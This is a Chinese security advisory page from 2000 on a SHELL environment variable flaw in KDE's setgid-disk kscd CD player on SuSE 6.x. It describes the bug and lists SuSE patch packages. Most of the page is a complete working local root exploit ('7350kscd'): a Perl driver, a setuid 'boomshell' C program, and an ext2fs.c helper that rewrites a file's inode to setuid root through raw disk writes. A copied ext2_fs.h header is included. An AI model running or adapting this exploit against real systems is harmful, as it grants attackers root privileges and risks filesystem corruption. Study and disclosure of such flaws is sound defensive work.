安全研究

安全漏洞
kscd SHELL 环境变量欺骗漏洞

发布日期:2000-05-17
更新日期:2000-05-31

受影响系统:
KDE KDE 2.0 BETA
KDE KDE 1.2
KDE KDE 1.1.1
KDE KDE 1.1
+ SuSE 6.1-6.4
不受影响系统:
RedHat 6.1
描述:

kscd是一个KDE桌面下的CD播放器软件,是KDE多媒体软件包中的一部分。在某些Linux系统下
这个应用程序缺省被设置了suid 'disk'位. kscd利用'SHELL'变量来执行shell,攻击者可以
修改SHELL变量的内容,让kscd去执行任意命令,攻击者可能可以获得disk用户的权限。利用
disk权限,攻击者也可能直接进行磁盘读写,从而获得超级用户的权限。


<* 来源:Sebastian <krahmer@cs.uni-potsdam.de> *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

--- 7350kscd ---
#    http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets:
#        TESO
#        security.is
#        lam3rz
#        29A
#        Mike and Silvio.
#
# Special thanx to
#
# C.P.           --     roots, bloody roots }|-]
# Michal Zalewski --    No sex causes what? I can't deciffer the pic ... :PP
#
# Description:
#
# kscd local root exploit. kscd belongs to the KDE multimedia-pack. (stupid)
# As so often with GUI's, kscd is setgid-disk and get's the shell for
# a browser-execution via SHELL-environment variable. So, we set it
# to /tmp/boomshell which will make ext2fs setgid-disk. Then we use
# ext2fs to change /tmp/boomshell to a setuid-root-file via raw-filesystem
# access (we are group disk!). Please make sure you have
#
# a) ext2fs-lib installed (default)
# b) kscd setgid disk (default on SuSE 6.4 f.e.)
# c) a CD in drive (hmmm ...)
# d) /tmp points to a disk where setuid's are allowes (default)
# e) brain and responsibility (unfortunally not default)    
#
# Note that the change via ext2fs takes affect after next re-mount (e.g. 'reboot')
# We assume that group disk has GID 6. Change if necessary.
#
#
# Warning: You are playing with your filesystem! This can cause data-loss.
#          Use a zip-disk for playing! YOU USE IT AT YOUR OWN RISK!
#       For educational purposes only!    
#
# This exploit goes under the GPL!
#

sub usage
{
    print "Usage: $0 <device_where_tmp_is (/dev/hdaX)>\n";
    exit 0;
}

$disk = shift or usage();

$kde = $ENV{'HOME'}."/.kde/share/config/kscdrc";

unlink $kde;

`cc ext2fs.c -lext2fs -o /tmp/ext2fs`;

# create kscd config-file -- necessary
open O, ">$kde" or die "Can't open config-file of kscd!\n";
print O<<_EOF_;
# KDE Config File
[SMTP]
enabled=true
serverHost=localhost
serverPort=25
[CDDB]
CurrentServer=www.cddb.com cddbp 8880 -
HTTPProxyHost=
CDDBRemoteEnabled=0
SeverList=www.cddb.com cddbp 8880 -,
CDDBHTTPProxyEnabled=0
HTTPProxyPort=0
LocalBaseDir=/opt/kde/share/apps/kscd/cddb/
[MAGIC]
magicwidth=320
magicheight=200
magicbrightness=3
[General]
ToolTips=1
RandomPlay=0
DOCKING=1
AUTOPLAY=0
CDDevice=/dev/cdrom
CustomBroserCmd=
BackColor=0,0,0
AUTODOCK=0
Volume=40
EJECTONFINISH=0
USEKFM=0
STOPEXIT=1
LEDColor=226,224,255
UnixMailCommand=owned
_EOF_
close O;

# drop boomshell
open O, ">/tmp/boomshell.c" or die "Can't open /tmp/boomshell!\n";
print O<<_EOF_;
#include <stdio.h>

int main()
{
    char *a[] = {
        "/bin/bash",
        NULL
    };
    setuid(0);
    setgid(0);
    
    /* in case we are invoked by kscd */
    if (getuid() != 0) {
        chown("/tmp/ext2fs", getuid(), 6);
        chmod("/tmp/ext2fs", 02755);
        return 0;
    }

    execve(*a, a, NULL);
    return 0;
}
_EOF_
close O;

`cc /tmp/boomshell.c -o /tmp/boomshell`;

$ENV{'PATH'}="/opt/kde/bin:".$ENV{'PATH'};
$ENV{'SHELL'}="/tmp/boomshell";

print "Invoking kscd now.\n";
print "Click [i] -> [Information] -> [Ultimate Bandlist]\n";
print "Exit kscd then.\nI will do the rest.\n";

`kscd`;

print "Execute /tmp/boomshell after next reboot.\n";
# ext2fs should be setgid-disk now, which lets us make a shell suid
exec "/tmp/ext2fs", $disk, "/tmp/boomshell";

--- ext2_fs.h ---

/*
*  linux/include/linux/ext2_fs.h
*
* Copyright (C) 1992, 1993, 1994, 1995
* Remy Card (card@masi.ibp.fr)
* Laboratoire MASI - Institut Blaise Pascal
* Universite Pierre et Marie Curie (Paris VI)
*
*  from
*
*  linux/include/linux/minix_fs.h
*
*  Copyright (C) 1991, 1992  Linus Torvalds
*/

#ifndef _LINUX_EXT2_FS_H
#define _LINUX_EXT2_FS_H

#include <asm/types.h>        /* Changed from linux/types.h */

/*
* The second extended filesystem constants/structures
*/

/*
* Define EXT2FS_DEBUG to produce debug messages
*/
#undef EXT2FS_DEBUG

/*
* Define EXT2_PREALLOCATE to preallocate data blocks for expanding files
*/
#define EXT2_PREALLOCATE
#define EXT2_DEFAULT_PREALLOC_BLOCKS    8

/*
* The second extended file system version
*/
#define EXT2FS_DATE        "95/08/09"
#define EXT2FS_VERSION        "0.5b"

/*
* Debug code
*/
#if 0
#ifdef EXT2FS_DEBUG
#    define ext2_debug(f, a...)    { \
                    printk ("EXT2-fs DEBUG (%s, %d): %s:", \
                        __FILE__, __LINE__, __FUNCTION__); \
                      printk (f, ## a); \
                    }
#else
#    define ext2_debug(f, a...)    /**/
#endif
#endif

/*
* Special inodes numbers
*/
#define    EXT2_BAD_INO         1    /* Bad blocks inode */
#define EXT2_ROOT_INO         2    /* Root inode */
#define EXT2_ACL_IDX_INO     3    /* ACL inode */
#define EXT2_ACL_DATA_INO     4    /* ACL inode */
#define EXT2_BOOT_LOADER_INO     5    /* Boot loader inode */
#define EXT2_UNDEL_DIR_INO     6    /* Undelete directory inode */

/* First non-reserved inode for old ext2 filesystems */
#define EXT2_GOOD_OLD_FIRST_INO    11

/*
* The second extended file system magic number
*/
#define EXT2_SUPER_MAGIC    0xEF53

/*
* Maximal count of links to a file
*/
#define EXT2_LINK_MAX        32000

/*
* Macro-instructions used to manage several block sizes
*/
#define EXT2_MIN_BLOCK_SIZE        1024
#define    EXT2_MAX_BLOCK_SIZE        4096
#define EXT2_MIN_BLOCK_LOG_SIZE          10
#ifdef __KERNEL__
# define EXT2_BLOCK_SIZE(s)        ((s)->s_blocksize)
#else
# define EXT2_BLOCK_SIZE(s)        (EXT2_MIN_BLOCK_SIZE << (s)->s_log_block_size)
#endif
#define EXT2_ACLE_PER_BLOCK(s)        (EXT2_BLOCK_SIZE(s) / sizeof (struct ext2_acl_entry))
#define    EXT2_ADDR_PER_BLOCK(s)        (EXT2_BLOCK_SIZE(s) / sizeof (__u32))
#ifdef __KERNEL__
# define EXT2_BLOCK_SIZE_BITS(s)    ((s)->s_blocksize_bits)
#else
# define EXT2_BLOCK_SIZE_BITS(s)    ((s)->s_log_block_size + 10)
#endif
#ifdef __KERNEL__
#define    EXT2_ADDR_PER_BLOCK_BITS(s)    ((s)->u.ext2_sb.s_addr_per_block_bits)
#define EXT2_INODE_SIZE(s)        ((s)->u.ext2_sb.s_inode_size)
#define EXT2_FIRST_INO(s)        ((s)->u.ext2_sb.s_first_ino)
#else
#define EXT2_INODE_SIZE(s)    (((s)->s_rev_level == EXT2_GOOD_OLD_REV) ? \
                 EXT2_GOOD_OLD_INODE_SIZE : \
                 (s)->s_inode_size)
#define EXT2_FIRST_INO(s)    (((s)->s_rev_level == EXT2_GOOD_OLD_REV) ? \
                 EXT2_GOOD_OLD_FIRST_INO : \
                 (s)->s_first_ino)
#endif

/*
* Macro-instructions used to manage fragments
*/
#define EXT2_MIN_FRAG_SIZE        1024
#define    EXT2_MAX_FRAG_SIZE        4096
#define EXT2_MIN_FRAG_LOG_SIZE          10
#ifdef __KERNEL__
# define EXT2_FRAG_SIZE(s)        ((s)->u.ext2_sb.s_frag_size)
# define EXT2_FRAGS_PER_BLOCK(s)    ((s)->u.ext2_sb.s_frags_per_block)
#else
# define EXT2_FRAG_SIZE(s)        (EXT2_MIN_FRAG_SIZE << (s)->s_log_frag_size)
# define EXT2_FRAGS_PER_BLOCK(s)    (EXT2_BLOCK_SIZE(s) / EXT2_FRAG_SIZE(s))
#endif

/*
* ACL structures
*/
struct ext2_acl_header    /* Header of Access Control Lists */
{
    __u32    aclh_size;
    __u32    aclh_file_count;
    __u32    aclh_acle_count;
    __u32    aclh_first_acle;
};

struct ext2_acl_entry    /* Access Control List Entry */
{
    __u32    acle_size;
    __u16    acle_perms;    /* Access permissions */
    __u16    acle_type;    /* Type of entry */
    __u16    acle_tag;    /* User or group identity */
    __u16    acle_pad1;
    __u32    acle_next;    /* Pointer on next entry for the */
                    /* same inode or on next free entry */
};

/*
* Structure of a blocks group descriptor
*/
struct ext2_group_desc
{
    __u32    bg_block_bitmap;        /* Blocks bitmap block */
    __u32    bg_inode_bitmap;        /* Inodes bitmap block */
    __u32    bg_inode_table;        /* Inodes table block */
    __u16    bg_free_blocks_count;    /* Free blocks count */
    __u16    bg_free_inodes_count;    /* Free inodes count */
    __u16    bg_used_dirs_count;    /* Directories count */
    __u16    bg_pad;
    __u32    bg_reserved[3];
};

/*
* Macro-instructions used to manage group descriptors
*/
#ifdef __KERNEL__
# define EXT2_BLOCKS_PER_GROUP(s)    ((s)->u.ext2_sb.s_blocks_per_group)
# define EXT2_DESC_PER_BLOCK(s)        ((s)->u.ext2_sb.s_desc_per_block)
# define EXT2_INODES_PER_GROUP(s)    ((s)->u.ext2_sb.s_inodes_per_group)
# define EXT2_DESC_PER_BLOCK_BITS(s)    ((s)->u.ext2_sb.s_desc_per_block_bits)
#else
# define EXT2_BLOCKS_PER_GROUP(s)    ((s)->s_blocks_per_group)
# define EXT2_DESC_PER_BLOCK(s)        (EXT2_BLOCK_SIZE(s) / sizeof (struct ext2_group_desc))
# define EXT2_INODES_PER_GROUP(s)    ((s)->s_inodes_per_group)
#endif

/*
* Constants relative to the data blocks
*/
#define    EXT2_NDIR_BLOCKS        12
#define    EXT2_IND_BLOCK            EXT2_NDIR_BLOCKS
#define    EXT2_DIND_BLOCK            (EXT2_IND_BLOCK + 1)
#define    EXT2_TIND_BLOCK            (EXT2_DIND_BLOCK + 1)
#define    EXT2_N_BLOCKS            (EXT2_TIND_BLOCK + 1)

/*
* Inode flags
*/
#define    EXT2_SECRM_FL            0x00000001 /* Secure deletion */
#define    EXT2_UNRM_FL            0x00000002 /* Undelete */
#define    EXT2_COMPR_FL            0x00000004 /* Compress file */
#define EXT2_SYNC_FL            0x00000008 /* Synchronous updates */
#define EXT2_IMMUTABLE_FL        0x00000010 /* Immutable file */
#define EXT2_APPEND_FL            0x00000020 /* writes to file may only append */
#define EXT2_NODUMP_FL            0x00000040 /* do not dump file */
#define EXT2_NOATIME_FL            0x00000080 /* do not update atime */
/* Reserved for compression usage... */
#define EXT2_DIRTY_FL            0x00000100
#define EXT2_COMPRBLK_FL        0x00000200 /* One or more compressed clusters */
#define EXT2_NOCOMP_FL            0x00000400 /* Don't compress */
#define EXT2_ECOMPR_FL            0x00000800 /* Compression error */
/* End compression flags --- maybe not all used */    
#define EXT2_BTREE_FL            0x00001000 /* btree format dir */
#define EXT2_RESERVED_FL        0x80000000 /* reserved for ext2 lib */

#define EXT2_FL_USER_VISIBLE        0x00001FFF /* User visible flags */
#define EXT2_FL_USER_MODIFIABLE        0x000000FF /* User modifiable flags */

/*
* ioctl commands
*/
#define    EXT2_IOC_GETFLAGS        _IOR('f', 1, long)
#define    EXT2_IOC_SETFLAGS        _IOW('f', 2, long)
#define    EXT2_IOC_GETVERSION        _IOR('v', 1, long)
#define    EXT2_IOC_SETVERSION        _IOW('v', 2, long)

/*
* Structure of an inode on the disk
*/
struct ext2_inode {
    __u16    i_mode;        /* File mode */
    __u16    i_uid;        /* Owner Uid */
    __u32    i_size;        /* Size in bytes */
    __u32    i_atime;    /* Access time */
    __u32    i_ctime;    /* Creation time */
    __u32    i_mtime;    /* Modification time */
    __u32    i_dtime;    /* Deletion Time */
    __u16    i_gid;        /* Group Id */
    __u16    i_links_count;    /* Links count */
    __u32    i_blocks;    /* Blocks count */
    __u32    i_flags;    /* File flags */
    union {
        struct {
            __u32  l_i_reserved1;
        } linux1;
        struct {
            __u32  h_i_translator;
        } hurd1;
        struct {
            __u32  m_i_reserved1;
        } masix1;
    } osd1;                /* OS dependent 1 */
    __u32    i_block[EXT2_N_BLOCKS];/* Pointers to blocks */
    __u32    i_version;    /* File version (for NFS) */
    __u32    i_file_acl;    /* File ACL */
    __u32    i_dir_acl;    /* Directory ACL */
    __u32    i_faddr;    /* Fragment address */
    union {
        struct {
            __u8    l_i_frag;    /* Fragment number */
            __u8    l_i_fsize;    /* Fragment size */
            __u16    i_pad1;
            __u32    l_i_reserved2[2];
        } linux2;
        struct {
            __u8    h_i_frag;    /* Fragment number */
            __u8    h_i_fsize;    /* Fragment size */
            __u16    h_i_mode_high;
            __u16    h_i_uid_high;
            __u16    h_i_gid_high;
            __u32    h_i_author;
        } hurd2;
        struct {
            __u8    m_i_frag;    /* Fragment number */
            __u8    m_i_fsize;    /* Fragment size */
            __u16    m_pad1;
            __u32    m_i_reserved2[2];
        } masix2;
    } osd2;                /* OS dependent 2 */
};

#define i_size_high    i_dir_acl

#if defined(__KERNEL__) || defined(__linux__)
#define i_reserved1    osd1.linux1.l_i_reserved1
#define i_frag        osd2.linux2.l_i_frag
#define i_fsize        osd2.linux2.l_i_fsize
#define i_reserved2    osd2.linux2.l_i_reserved2

#elif defined(__GNU__)
#define i_translator    osd1.hurd1.h_i_translator
#define i_frag        osd2.hurd2.h_i_frag;
#define i_fsize        osd2.hurd2.h_i_fsize;
#define i_uid_high    osd2.hurd2.h_i_uid_high
#define i_gid_high    osd2.hurd2.h_i_gid_high
#define i_author    osd2.hurd2.h_i_author

#elif defined (__masix__)
#define i_reserved1    osd1.masix1.m_i_reserved1
#define i_frag        osd2.masix2.m_i_frag
#define i_fsize        osd2.masix2.m_i_fsize
#define i_reserved2    osd2.masix2.m_i_reserved2
#endif /* defined(__KERNEL__) || defined(__linux__) */

/*
* File system states
*/
#define    EXT2_VALID_FS            0x0001    /* Unmounted cleanly */
#define    EXT2_ERROR_FS            0x0002    /* Errors detected */

/*
* Mount flags
*/
#define EXT2_MOUNT_CHECK_NORMAL        0x0001    /* Do some more checks */
#define EXT2_MOUNT_CHECK_STRICT        0x0002    /* Do again more checks */
#define EXT2_MOUNT_CHECK        (EXT2_MOUNT_CHECK_NORMAL | \
                     EXT2_MOUNT_CHECK_STRICT)
#define EXT2_MOUNT_GRPID        0x0004    /* Create files with directory's group */
#define EXT2_MOUNT_DEBUG        0x0008    /* Some debugging messages */
#define EXT2_MOUNT_ERRORS_CONT        0x0010    /* Continue on errors */
#define EXT2_MOUNT_ERRORS_RO        0x0020    /* Remount fs ro on errors */
#define EXT2_MOUNT_ERRORS_PANIC        0x0040    /* Panic on errors */
#define EXT2_MOUNT_MINIX_DF        0x0080    /* Mimics the Minix statfs */

#define clear_opt(o, opt)        o &= ~EXT2_MOUNT_##opt
#define set_opt(o, opt)            o |= EXT2_MOUNT_##opt
#define test_opt(sb, opt)        ((sb)->u.ext2_sb.s_mount_opt & \
                     EXT2_MOUNT_##opt)
/*
* Maximal mount counts between two filesystem checks
*/
#define EXT2_DFL_MAX_MNT_COUNT        20    /* Allow 20 mounts */
#define EXT2_DFL_CHECKINTERVAL        0    /* Don't use interval check */

/*
* Behaviour when detecting errors
*/
#define EXT2_ERRORS_CONTINUE        1    /* Continue execution */
#define EXT2_ERRORS_RO            2    /* Remount fs read-only */
#define EXT2_ERRORS_PANIC        3    /* Panic */
#define EXT2_ERRORS_DEFAULT        EXT2_ERRORS_CONTINUE

/*
* Structure of the super block
*/
struct ext2_super_block {
    __u32    s_inodes_count;        /* Inodes count */
    __u32    s_blocks_count;        /* Blocks count */
    __u32    s_r_blocks_count;    /* Reserved blocks count */
    __u32    s_free_blocks_count;    /* Free blocks count */
    __u32    s_free_inodes_count;    /* Free inodes count */
    __u32    s_first_data_block;    /* First Data Block */
    __u32    s_log_block_size;    /* Block size */
    __s32    s_log_frag_size;    /* Fragment size */
    __u32    s_blocks_per_group;    /* # Blocks per group */
    __u32    s_frags_per_group;    /* # Fragments per group */
    __u32    s_inodes_per_group;    /* # Inodes per group */
    __u32    s_mtime;        /* Mount time */
    __u32    s_wtime;        /* Write time */
    __u16    s_mnt_count;        /* Mount count */
    __s16    s_max_mnt_count;    /* Maximal mount count */
    __u16    s_magic;        /* Magic signature */
    __u16    s_state;        /* File system state */
    __u16    s_errors;        /* Behaviour when detecting errors */
    __u16    s_minor_rev_level;     /* minor revision level */
    __u32    s_lastcheck;        /* time of last check */
    __u32    s_checkinterval;    /* max. time between checks */
    __u32    s_creator_os;        /* OS */
    __u32    s_rev_level;        /* Revision level */
    __u16    s_def_resuid;        /* Default uid for reserved blocks */
    __u16    s_def_resgid;        /* Default gid for reserved blocks */
    /*
     * These fields are for EXT2_DYNAMIC_REV superblocks only.
     *
     * Note: the difference between the compatible feature set and
     * the incompatible feature set is that if there is a bit set
     * in the incompatible feature set that the kernel doesn't
     * know about, it should refuse to mount the filesystem.
     *
     * e2fsck's requirements are more strict; if it doesn't know
     * about a feature in either the compatible or incompatible
     * feature set, it must abort and not try to meddle with
     * things it doesn't understand...
     */
    __u32    s_first_ino;         /* First non-reserved inode */
    __u16   s_inode_size;         /* size of inode structure */
    __u16    s_block_group_nr;     /* block group # of this superblock */
    __u32    s_feature_compat;     /* compatible feature set */
    __u32    s_feature_incompat;     /* incompatible feature set */
    __u32    s_feature_ro_compat;     /* readonly-compatible feature set */
    __u8    s_uuid[16];        /* 128-bit uuid for volume */
    char    s_volume_name[16];     /* volume name */
    char    s_last_mounted[64];     /* directory where last mounted */
    __u32    s_algorithm_usage_bitmap; /* For compression */
    /*
     * Performance hints.  Directory preallocation should only
     * happen if the EXT2_COMPAT_PREALLOC flag is on.
     */
    __u8    s_prealloc_blocks;    /* Nr of blocks to try to preallocate*/
    __u8    s_prealloc_dir_blocks;    /* Nr to preallocate for dirs */
    __u16    s_padding1;
    __u32    s_reserved[204];    /* Padding to the end of the block */
};

#ifdef __KERNEL__
#define EXT2_SB(sb)    (&((sb)->u.ext2_sb))
#else
/* Assume that user mode programs are passing in an ext2fs superblock, not
* a kernel struct super_block.  This will allow us to call the feature-test
* macros from user land. */
#define EXT2_SB(sb)    (sb)
#endif

/*
* Codes for operating systems
*/
#define EXT2_OS_LINUX        0
#define EXT2_OS_HURD        1
#define EXT2_OS_MASIX        2
#define EXT2_OS_FREEBSD        3
#define EXT2_OS_LITES        4

/*
* Revision levels
*/
#define EXT2_GOOD_OLD_REV    0    /* The good old (original) format */
#define EXT2_DYNAMIC_REV    1     /* V2 format w/ dynamic inode sizes */

#define EXT2_CURRENT_REV    EXT2_GOOD_OLD_REV
#define EXT2_MAX_SUPP_REV    EXT2_DYNAMIC_REV

#define EXT2_GOOD_OLD_INODE_SIZE 128

/*
* Feature set definitions
*/

#define EXT2_HAS_COMPAT_FEATURE(sb,mask)            \
    ( EXT2_SB(sb)->s_feature_compat & (mask) )
#define EXT2_HAS_RO_COMPAT_FEATURE(sb,mask)            \
    ( EXT2_SB(sb)->s_feature_ro_compat & (mask) )
#define EXT2_HAS_INCOMPAT_FEATURE(sb,mask)            \
    ( EXT2_SB(sb)->s_feature_incompat & (mask) )

#define EXT2_FEATURE_COMPAT_DIR_PREALLOC    0x0001

#define EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER    0x0001
#define EXT2_FEATURE_RO_COMPAT_LARGE_FILE    0x0002
#define EXT2_FEATURE_RO_COMPAT_BTREE_DIR    0x0004

#define EXT2_FEATURE_INCOMPAT_COMPRESSION    0x0001
#define EXT2_FEATURE_INCOMPAT_FILETYPE        0x0002

#define EXT2_FEATURE_COMPAT_SUPP    0
#define EXT2_FEATURE_INCOMPAT_SUPP    EXT2_FEATURE_INCOMPAT_FILETYPE
#define EXT2_FEATURE_RO_COMPAT_SUPP    (EXT2_FEATURE_RO_COMPAT_SPARSE_SUPER| \
                     EXT2_FEATURE_RO_COMPAT_LARGE_FILE| \
                     EXT2_FEATURE_RO_COMPAT_BTREE_DIR)

/*
* Default values for user and/or group using reserved blocks
*/
#define    EXT2_DEF_RESUID        0
#define    EXT2_DEF_RESGID        0

/*
* Structure of a directory entry
*/
#define EXT2_NAME_LEN 255

struct ext2_dir_entry {
    __u32    inode;            /* Inode number */
    __u16    rec_len;        /* Directory entry length */
    __u16    name_len;        /* Name length */
    char    name[EXT2_NAME_LEN];    /* File name */
};

/*
* The new version of the directory entry.  Since EXT2 structures are
* stored in intel byte order, and the name_len field could never be
* bigger than 255 chars, it's safe to reclaim the extra byte for the
* file_type field.
*/
struct ext2_dir_entry_2 {
    __u32    inode;            /* Inode number */
    __u16    rec_len;        /* Directory entry length */
    __u8    name_len;        /* Name length */
    __u8    file_type;
    char    name[EXT2_NAME_LEN];    /* File name */
};

/*
* Ext2 directory file types.  Only the low 3 bits are used.  The
* other bits are reserved for now.
*/
#define EXT2_FT_UNKNOWN        0
#define EXT2_FT_REG_FILE    1
#define EXT2_FT_DIR        2
#define EXT2_FT_CHRDEV        3
#define EXT2_FT_BLKDEV         4
#define EXT2_FT_FIFO        5
#define EXT2_FT_SOCK        6
#define EXT2_FT_SYMLINK        7

#define EXT2_FT_MAX        8

/*
* EXT2_DIR_PAD defines the directory entries boundaries
*
* NOTE: It must be a multiple of 4
*/
#define EXT2_DIR_PAD             4
#define EXT2_DIR_ROUND             (EXT2_DIR_PAD - 1)
#define EXT2_DIR_REC_LEN(name_len)    (((name_len) + 8 + EXT2_DIR_ROUND) & \
                     ~EXT2_DIR_ROUND)

#ifdef __KERNEL__
/*
* Function prototypes
*/

/*
* Ok, these declarations are also in <linux/kernel.h> but none of the
* ext2 source programs needs to include it so they are duplicated here.
*/
# define NORET_TYPE    /**/
# define ATTRIB_NORET  __attribute__((noreturn))
# define NORET_AND     noreturn,

/* acl.c */
extern int ext2_permission (struct inode *, int);

/* balloc.c */
extern int ext2_new_block (const struct inode *, unsigned long,
               __u32 *, __u32 *, int *);
extern void ext2_free_blocks (const struct inode *, unsigned long,
                  unsigned long);
extern unsigned long ext2_count_free_blocks (struct super_block *);
extern void ext2_check_blocks_bitmap (struct super_block *);

/* bitmap.c */
extern unsigned long ext2_count_free (struct buffer_head *, unsigned);

/* dir.c */
extern int ext2_check_dir_entry (const char *, struct inode *,
                 struct ext2_dir_entry_2 *, struct buffer_head *,
                 unsigned long);

/* file.c */
extern int ext2_read (struct inode *, struct file *, char *, int);
extern int ext2_write (struct inode *, struct file *, char *, int);

/* fsync.c */
extern int ext2_sync_file (struct file *, struct dentry *);

/* ialloc.c */
extern struct inode * ext2_new_inode (const struct inode *, int, int *);
extern void ext2_free_inode (struct inode *);
extern unsigned long ext2_count_free_inodes (struct super_block *);
extern void ext2_check_inodes_bitmap (struct super_block *);

/* inode.c */
extern int ext2_bmap (struct inode *, int);

extern struct buffer_head * ext2_getblk (struct inode *, long, int, int *);
extern struct buffer_head * ext2_bread (struct inode *, int, int, int *);

extern int ext2_getcluster (struct inode * inode, long block);
extern void ext2_read_inode (struct inode *);
extern void ext2_write_inode (struct inode *);
extern void ext2_put_inode (struct inode *);
extern void ext2_delete_inode (struct inode *);
extern int ext2_sync_inode (struct inode *);
extern void ext2_discard_prealloc (struct inode *);

/* ioctl.c */
extern int ext2_ioctl (struct inode *, struct file *, unsigned int,
               unsigned long);

/* namei.c */
extern void ext2_release (struct inode *, struct file *);
extern int ext2_lookup (struct inode *, struct dentry *);
extern int ext2_create (struct inode *,struct dentry *,int);
extern int ext2_mkdir (struct inode *,struct dentry *,int);
extern int ext2_rmdir (struct inode *,struct dentry *);
extern int ext2_unlink (struct inode *,struct dentry *);
extern int ext2_symlink (struct inode *,struct dentry *,const char *);
extern int ext2_link (struct dentry *, struct inode *, struct dentry *);
extern int ext2_mknod (struct inode *, struct dentry *, int, int);
extern int ext2_rename (struct inode *, struct dentry *,
            struct inode *, struct dentry *);

/* super.c */
extern void ext2_error (struct super_block *, const char *, const char *, ...)
    __attribute__ ((format (printf, 3, 4)));
extern NORET_TYPE void ext2_panic (struct super_block *, const char *,
                   const char *, ...)
    __attribute__ ((NORET_AND format (printf, 3, 4)));
extern void ext2_warning (struct super_block *, const char *, const char *, ...)
    __attribute__ ((format (printf, 3, 4)));
extern void ext2_put_super (struct super_block *);
extern void ext2_write_super (struct super_block *);
extern int ext2_remount (struct super_block *, int *, char *);
extern struct super_block * ext2_read_super (struct super_block *,void *,int);
extern int init_ext2_fs(void);
extern int ext2_statfs (struct super_block *, struct statfs *, int);

/* truncate.c */
extern void ext2_truncate (struct inode *);

/*
* Inodes and files operations
*/

/* dir.c */
extern struct inode_operations ext2_dir_inode_operations;

/* file.c */
extern struct inode_operations ext2_file_inode_operations;

/* symlink.c */
extern struct inode_operations ext2_symlink_inode_operations;

#endif    /* __KERNEL__ */

#endif    /* _LINUX_EXT2_FS_H */


--- ext2fs.c ---


/* This file belongs to the kscd-hack. Do not use it at all,
* it is called by the perl-script.
* FOR EDUCATIONAL PURPOSES ONLY!
* YOU USE IT AT YOUR OWN RISK!
*/
#include <stdio.h>
#include "ext2_fs.h"
#include <ext2fs/ext2fs.h>
#include <ext2fs/ext2_io.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/types.h>
#include <errno.h>
#include <string.h>

int usage(char *s)
{
    fprintf(stderr, "Man, use it like this: %s <filesystem> <file>\n", s);
    exit(1);
}

int main(int argc, char **argv)
{
    
    ext2_filsys fsd;
    struct stat st;
    struct ext2_inode stealth_inode;
    int i;
    
    if (argc < 3)
        usage(argv[0]);

    /* Fetch inode# */
    if (stat(argv[2], &st) < 0) {
        perror("stat");
        exit(errno);
    }

    for (i = 0; i < 10; i++)
        sync();
    
    if (ext2fs_open(argv[1], EXT2_FLAG_RW /* open RW */, 0 /* use def. superblock */, 0 /* def.size */,
                unix_io_manager /* default manager */, &fsd) != 0) {
            
        fprintf(stderr, "Error opeening %s-FS\n", argv[1]);
        exit(errno);
    }
    printf("Your fuxoring inode-number is %d\n", st.st_ino);
    if (ext2fs_read_inode(fsd, st.st_ino, &stealth_inode) != 0) {
        fprintf(stderr, "Error reading inode.\n");
        exit(1);
    }
    stealth_inode.i_mode = 06755|S_IFREG;
    stealth_inode.i_uid = 0;
    stealth_inode.i_gid = 0;
    
    if (ext2fs_write_inode(fsd, st.st_ino, &stealth_inode) != 0) {
        fprintf(stderr, "Error writing inode.\n");
        exit(1);
    }
    if (ext2fs_close(fsd) != 0) {
        fprintf(stderr, "Error closing filesystem.\n");
        exit(1);
    }
    printf("The requested file will have mode 06755 after next remount. Make sure nobody\n"
           "open()/close() it until remount, coz kernel still has the old mode 0755 cached\n"
           "and will write this to disk if you do so!\n\n");
    return 0;
}


建议:
SuSE 提供了相应的升级软件包,可以在下列地址下载:

AXP:
817852e77080ecb444cb3ab9d0e6f52d  ftp://ftp.suse.com/pub/suse/axp/update/6.1/kde1/kmulti-1.1.2-141.alpha.rpm
bf3ea6a10793225d5468efa72efb13cb  ftp://ftp.suse.com/pub/suse/axp/update/6.1/zq1/kmulti-1.1.2-141.src.rpm
8e1cc62cf437c43eca044562637d9ea3  ftp://ftp.suse.com/pub/suse/axp/update/6.3/kde1/kmulti-1.1.2-141.alpha.rpm
61dc0c2588a707ec9ba1c6be00aac58c  ftp://ftp.suse.com/pub/suse/axp/update/6.3/zq1/kmulti-1.1.2-141.src.rpm
45e951b3b14435a1c1ab89d3e4e5df1d  ftp://ftp.suse.com/pub/suse/axp/update/6.4/kde1/kmulti-1.1.2-141.alpha.rpm
a70b356603227e1a0e49d0eeab934ad8  ftp://ftp.suse.com/pub/suse/axp/update/6.4/zq1/kmulti-1.1.2-141.src.rpm

i386:
d4c6bc55edbb9aa4da76b2d9b186e6a9  ftp://ftp.suse.com/pub/suse/i386/update/6.1/kde1/kmulti-1.1.2-141.i386.rpm
9ac324e3a9bb1794280d8175f5762d5d  ftp://ftp.suse.com/pub/suse/i386/update/6.1/zq1/kmulti-1.1.2-141.src.rpm
f8318113abdde6e2a9118db63d50a550  ftp://ftp.suse.com/pub/suse/i386/update/6.2/kde1/kmulti-1.1.2-141.i386.rpm
18d5fc80412db2dc70770d9b175180d9  ftp://ftp.suse.com/pub/suse/i386/update/6.2/zq1/kmulti-1.1.2-141.src.rpm
43f1febe8dc5502132246b8ad977db54  ftp://ftp.suse.com/pub/suse/i386/update/6.3/kde1/kmulti-1.1.2-141.i386.rpm
bce686afd6186c9cb9816ccf95744040  ftp://ftp.suse.com/pub/suse/i386/update/6.3/zq1/kmulti-1.1.2-141.src.rpm
4a14b88f9b6f80c8ffcf4b82750d7bfb  ftp://ftp.suse.com/pub/suse/i386/update/6.4/kde1/kmulti-1.1.2-140.i386.rpm
de787463851f38b69e576cf8de7d9309  ftp://ftp.suse.com/pub/suse/i386/update/6.4/zq1/kmulti-1.1.2-140.src.rpm

PPC:
3de7429a24620ca2b7e61f799478e2b8  ftp://ftp.suse.com/pub/suse/ppc/update/6.4/kde1/kmulti-1.1.2-141.ppc.rpm
444e9ffc4fbc643deb208c45bcb31725  ftp://ftp.suse.com/pub/suse/ppc/update/6.4/zq1/kmulti-1.1.2-141.src.rpm

浏览次数:7039
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障